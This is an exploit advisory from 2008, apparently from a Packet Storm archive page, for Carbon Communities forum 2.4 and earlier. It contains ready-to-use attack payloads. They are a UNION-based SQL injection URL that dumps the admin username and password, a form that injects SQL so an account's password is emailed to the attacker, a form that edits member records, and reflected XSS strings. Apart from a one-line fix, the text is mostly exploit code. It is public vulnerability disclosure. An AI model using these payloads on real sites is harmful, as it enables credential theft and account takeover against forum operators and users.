what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

carboncom-multi.txt

carboncom-multi.txt
Posted Apr 16, 2008
Authored by AmnPardaz Security Research Team | Site bugreport.ir

Carbon Communities Forum versions 2.4 and below suffer from SQL injection and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | ec8b6da167cb0ac04f04778c691d037a9cd993aa0d5833d3b0c4f5594180c62e

carboncom-multi.txt

Change Mirror Download
########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: Multiple Vulnerabilities in Carbon Communities forum.
# Vendor: www.carboncommunities.com
# Vulnerable Version: 2.4 and prior versions
# Exploit: Available
# Impact: High
# Fix: N/A
# Original Advisory: http://bugreport.ir/index.php?/35
###################################################################################


####################
1. Description:
####################
Carbon Communities is a high powered, fully scalable, and highly customizable online portal, message boards/ bulletin board, discussion hub, Private messaging, Event Calendars, Emails and chat software rolled into one.

####################
2. Vulnerability:
####################
2.1. There is a SQL Injection in "events.asp?id=[Injection]". By using it, attacker can gain usernames and passwords.
2.1.1. POC:
Check exploits section.
2.2. There is a SQL Injection in "getpassword.asp". By using it, attacker can send any password to his/her email address.(exploit available)
2.2.1. POC:
Check exploits section.
2.3. There is a SQL Injection in "option_Update.asp". By using it, attacker can update member info.(exploit available)
2.3.1. POC:
Check exploits section.
2.4. There are some XSS in "login.asp" and "member_send.asp".
2.4.1. POC:
/login.asp?Redirect='><script>alert('XSS')</script><fake a='
/member_send.asp?OrderBy='><script>alert('XSS')</script><fake a='
####################
3. Exploits:
####################

Original Exploit URL: http://bugreport.ir/index.php?/35/exploit

3.1. Attacker can gain usernames and passwords:
-------------
http://[CarbonCommunitiesURL]/events.asp?ID=-1 union all select 1,1,1,'Username= '%2bmember_name%2b'<br>Password= '%2bmember_password,1,1,1,1,1,1,1 from tbl_Members where member_name = 'admin'
-------------
3.2. Attacker can send any password to his/her email address:
-------------
<script language="javascript">
function check(){
document.getElementById("UserName").value = "1' or uCase(Member_Name)='"+ document.getElementById("UserName").value
}
</script>
<form action="http://[CarbonCommunitiesURL]/getpassword.asp" method="post" onsubmit="check()">
UserName: <input type="text" name="UserName" id="UserName" value="default" size="100" />
<br />
EMail: <input type="text" name="EMail" value="Your Email Address" size="100" />
<br />
<input type="submit" />
</form>
-------------
3.3. Attacker can update member info.:
-------------
<form action="http://[CarbonCommunitiesURL]/option_Update.asp?Action=edit" method="post">
ID<input type="text" name="ID" value="1"/>
<br />
Member_Cookies<input type="text" name="Member_Cookies" value="Yes" />
<br />
Member_SystemCookies<input type="text" name="Member_SystemCookies" value="Yes" />
<br />
Member_Center<input type="text" name="Member_Center" value="1" />
<br />
Member_EmailTheadResponse<input type="text" name="Member_EmailTheadResponse" value="1" />
<br />
Member_EmailPostResponse<input type="text" name="Member_EmailPostResponse" value="1" />
<br />
Member_WeekStart<input type="text" name="Member_WeekStart" value="0" />
<br />
Member_ThreadDays<input type="text" name="Member_ThreadDays" value="0" />
<br />
Member_ThreadView<input type="text" name="Member_ThreadView" value="0" />
<br />
Member_Invisible<input type="text" name="Member_Invisible" value="1" />
<br />
Member_HiddenEmail<input type="text" name="Member_HiddenEmail" value="0" />
<br />
Member_ReceivePM<input type="text" name="Member_ReceivePM" value="1" />
<br />
Member_PMEmailNotice<input type="text" name="Member_PMEmailNotice" value="1" />
<br />
Member_PMPopup<input type="text" name="Member_PMPopup" value="1" />
<br />
Member_Newsletter<input type="text" name="Member_Newsletter" value="0" />
<br />
Member_TimeZone<input type="text" name="Member_TimeZone" value="0" />
<br />
Member_DefaultColor<input type="text" name="Member_DefaultColor" value="1" />
<br />
<input type="submit" />
</form>
-------------
####################
4. Solution:
####################
Edit the source code to ensure that inputs are properly sanitised.
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close